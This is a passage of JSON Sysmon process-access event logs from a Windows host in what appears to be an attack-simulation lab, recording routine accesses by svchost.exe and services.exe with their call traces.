5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.537\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 2632\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E2FD0200}\r\nTargetProcessId: 3520\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.537","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"2632","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E2FD0200}","TargetProcessId":"3520","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
